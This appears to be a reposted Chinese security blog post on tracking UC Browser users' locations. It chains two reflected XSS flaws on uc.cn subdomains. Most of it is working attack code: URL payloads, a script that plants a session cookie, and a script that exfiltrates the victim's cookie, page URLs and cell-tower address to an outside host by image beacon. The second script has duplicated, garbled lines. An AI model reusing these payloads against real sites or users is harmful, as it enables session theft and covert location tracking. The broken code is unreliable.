当PC时代的辉光逐渐隐入了暮霭,一轮更加炫目的红日正在缓缓升起,时至今日,移动互联网已经成为引领时代发展与前沿技术不断革新的中流砥柱,短短十数年 间,手机的兴盛就超出了所有人的预料,大海淘沙,洗尽多少红尘铅华,新的思想,新的技术如雨后春笋般,让人目不暇接。智能化网络、云计算大存储服务、大数 据交互技术、3G/4G乃至5G网络等等新技术层出不穷,然而与此同时,一个个新的问题开始逐渐显露出了它的冰山一角,那就是信息交流如此频繁的今天,谁 来保护用户的隐私信息安全,本文将通过uc浏览器实现远程定位追踪的案例,展现潜藏在流行应用里面的安全漏洞所造成的危害!
声明:本文为作者技术交流文章,勿作他用!!
uc浏览器会使用基站定位当前位置,并在uc乐园(u.uc.cn)显示。
使用burp抓取uc乐园主页数据分析(http://yaseng.me/use-burpsuite-audit-android-app- data.html)页面,此页面需要cookie登陆验证想要获取 http://u.uc.cn/?uc_param_str=sspfligiwinieisive&&gamePage=1
页面的内容即获取用户位置,由于浏览器的同源策略与登陆验证等
操作.uc.cn cookie
只能同源获取数据
一个u.uc.cn 域下的xss
一个其他子域的xss
简单的fuzz了下 *.uc.cn 的xss,正好满足老衲的需求
1
2
|
xss1:http://epay.uc.cn/index.php?do=%3Cscript%3Ealert%280%29%3C/script%3E
xss2:http://u.uc.cn/?uc_param_str=sspfligiwinieisive&r=mood/view&moodId=4439141839360554257&userId=1&msg=<SCRIPT>alert(0)</SCRIPT>
|
1
|
任意html页面iframe xss1 页面加载1.js -> 1.js 设置登陆cookie 并 iframe xss2 加载 2.js -> 2.js 得到同源的location表单数据 发送到服务端
|
1.js
1
2
3
|
document.cookie=“ly_sess=2634Mq37%2BglvX2pOxslrjS4mqhy3t1YOaF3F5%2BlVTbhz51JLIf6otrhDbSUEshVZ71T%2BAwN%2B%2F4GMlOFnYDkMoCrmQf3bkDrmUG9VDB%2F2jbed5%2BrJFA;path=/;domain=.uc.cn;gamePage=1″
var b = document.createElement(‘iframe’);b.src=‘http://u.uc.cn/?uc_param_str=sspfligiwinieisive&&gamePage=1′;b.style.display=“none”; document.body.appendChild(b);
var c = document.createElement(‘iframe’);c.src=‘http://u.uc.cn/?uc_param_str=sspfligiwinieisive&r=mood/view&moodId=4439141839360554257&userId=1&msg=<script src=//www.xxx.com/2.js></script>’;document.body.appendChild(c);
|
2.js(xss platform 模块代码)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
var b = document.createElement(‘iframe’);
b.onload = function() {
var a;
try {
if (document.all) {
a = document.frames[“location”].document;
} else {
a = document.getElementById(“location”).contentDocument;
}
var l = a.all.location.value;
if (l) {
img = new Image();
img.src = “http://xxx.sinaapp.com/index.php?do=api&id={projectId}&cookie=” + escape(document.cookie) + “&location=” + escape(window.location.href) + “&top=” + escape(top.location.href) + “&address=” + escape(l);
img.width = 0;
img.height = 0;
}
} catch(ex) {}
}
b.src = ‘/?uc_param_str=sspfligiwinieisive&&gamePage=1′;
b.id = “location”;
b.style.display = “none”;
document.body.appendChild(b);
} catch(ex) {
}
}
b.src = ‘/?uc_param_str=sspfligiwinieisive&&gamePage=1′;
b.id = “location”;
b.style.display = “none”;
document.body.appendChild(b);
|
学无余力,仓促之间,一蹴而就,恐有失偏颇,错漏之处,欢迎指正,对文章所提到之内容,有兴趣者,可自行调试,本文目的在于学习与交流,请勿用作他途!
相关文章推荐《xss的科普扫盲[第一章]》《XSS之分布式破解》
[via@yaseng]
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号